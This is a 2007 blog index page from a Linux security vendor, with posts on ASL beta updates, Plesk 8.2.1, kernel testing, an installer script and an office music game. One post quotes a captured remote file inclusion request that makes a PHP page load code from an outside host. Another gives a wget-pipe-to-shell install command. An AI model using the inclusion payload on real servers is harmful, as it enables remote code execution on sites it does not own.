|
Written by scott
|
|
Monday, 15 October 2007 |
Every day I go through the alert data collected in the ASL gui to look for new patterns of abuse, ways to improve the engine, or other assorted tinkering-like activities. A lot of my day is spent like that, just collecting all sorts of random data that sometimes adds up to something useful. Most of the time it ends up with a lot of useless oneliners from TV or movies. Anyway... back to my point. What does a web attack look like? The following is a real attack captured from one of our servers:
GET /index.php?display=http://amyru.h18.ru/images/cs.txt? HTTP/1.1
Host: www.domain.com
User-Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)
Write Comment (2 Comments) |
|
Read more...
|
|
|
Written by scott
|
|
Monday, 15 October 2007 |
2 minor Beta 2 updates have been released, all updates are available in the [asl-2.0] channel:
[*] php-ioncube-loader 3.1-2 updates Ioncube(tm) to version 3.1. Update replaces php5-ioncube-loader distributed with Plesk Server Administrator. This package has been co-released in the [atomic] channel.
[-] perl-Unix-Syslog 0.100-10 fixes issues with detection on x86_64 platforms, and corrects a related bug in psmon.
Legend:
[*] New feature
[-] Bug fix
Write Comment (0 Comments) |
|
Last Updated ( Monday, 15 October 2007 )
|
|
|
Written by scott
|
|
Saturday, 13 October 2007 |
Archive at www.atomicorp.com/channels/plesk has been updated to 8.2.1. Next on the list will be to update the atomic installer to prompt for configuration of the Plesk channel, in addition to the other fun stuff it does (like convert to CentOS).
Whats New in 8.2.1
[*] Security improvements and bugfixes
[*] Upgrade procedure improvements
[-] Several autoinstller utility bugs with packages checking and mirroring have been resolved
[-] Several selinux configuration issues have been resolved.
[-] Several Backup and Migration bugs have been fixed.
[-] Issue with mail stucked in qmail-queue is resolved.
[-] Issue with sending notifications about domain expiration by statistics utility is resolved.
[-] Issue with permanent Spamassassin restarting by Watchdog is resolved.
[-] Problem with incorrect message("Management of parent node is forbidden") after domain deletion is resolved.
[-] Issue with mailling lists with dot symbols is resolved
[-] Issue with php safe mode management by client is resolved.
[-] Issue with incorrect php dependences of 'coppermine' and 'gallary' packages is resolved.
[-] Several issues with MySQL packages from mysql.com compatibility have been resolved.
[-] Issue with mysqldump.sh utility is resolved.
Write Comment (0 Comments) |
|
Last Updated ( Saturday, 13 October 2007 )
|
|
|
Written by scott
|
|
Wednesday, 10 October 2007 |
In an effort to make the site a little more sticky, I've decided to start a post-daily policy. Given that its Friday I figured I'd leave everyone with a game we play here at the Pro-G (Prometheus Group).
As much as I would like to take credit for the Bear or Monkey game, Mike came up with it. Heres how it works: before you change to the XM radio Liquid Metal channel (42), you call out “Bear” or “Monkey”. If the band sounds like a Bear* you get 1 point. If they sound like a Monkey** you get 2 points (this is because XM42 tends to gravitate toward more Bear-like behavior). If you get it wrong, then you lose those points. Exception: If you call Monkey, and its Bear... but there is at any point in the song a bit of Monkey, then you only lose 1 point. Oh... and 2 points for Girl Bear***. Got it?
*Burzum, lamb of God: these are bear.
**Judas Priest, Dragonforce: monkey.
*** I have no examples of a girl bear band. Im told they exist.
Write Comment (0 Comments) |
|
Last Updated ( Wednesday, 10 October 2007 )
|
|
|
Written by scott
|
|
Tuesday, 09 October 2007 |
Issues with memory management and bios detection have been resolved, so now we have our first cut of a 2.6.22.9 kernel. It still needs further hardware testing since we've run into issues with 2.6.22.x kernels in general with our hardware here. I'm not sure I'll approve this in the ASL beta 3 roll up or not. I'll probably field this in asl-2.0-bleeding first. I also had a few users push hard on an OSSEC update to fix the timestamp issues which has been fixed in CVS. Likely this too will go into -bleeding for a bit so we can keep an eye on it.
I'll be honest, I never expected to have this kind of mixed user base with ASL. Generally security products go toward a more conservative, risk averse crowd. I'd say thats still the vast majority out there, but in this case I have people that are more than willing/demanding to field alpha quality file system code on production web sites. Kudos to you all. You know who you are, and I think the Time Shifting stuff is amazing too.
Other changes coming up in B3 include better control of email alerts, lots and lots of bug fixes, and some new modules around process monitoring and DoS protection. If you have ideas, requests, or comments on what we've put together so far, please let us know at
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
Write Comment (0 Comments) |
|
Last Updated ( Thursday, 11 October 2007 )
|
|
|
Written by scott
|
|
Tuesday, 09 October 2007 |
Major changes in this update include re-imaging the system with CentOS 5, and fixes issues with newer 1and1 kernels that do not support the vfat file system (*shaking head ruefully*). Documentation has been updated on the projects page, and the location for the script has moved from the old 3es.atomicrocketturtle.com server to www.atomicorp.com.
There are still some outstanding issues I've run into with CentOS 5 on some 1and1 hardware. Occasionally the network card will not start up correctly. Theres no fix I can put in place for this, without updating the CentOS 5 ISO itself.
Running the installer now uses the atomic/asl/key shortcut model:
wget -q -O - http://www.atomicorp.com/installers/aooi |sh
Changelog
- Updated installer to use CentOS 5
- Added better detection for x86_64 and i386 ISO images
- If the kernel does not use vfat, the temporary partition will use ext3, labeled as vfat
- Fixed issues with partitioning mirrored disks on /, the mirror should now be created correctly
Thanks go out to Damien at 1and1.fr for his assistance in updating and testing the installer.
Write Comment (0 Comments) |
|
Last Updated ( Tuesday, 09 October 2007 )
|
|
|
|
<< Start < Prev 1 2 3 4 5 6 7 8 9 10 Next > End >>
|
| Results 12 - 22 of 165 |
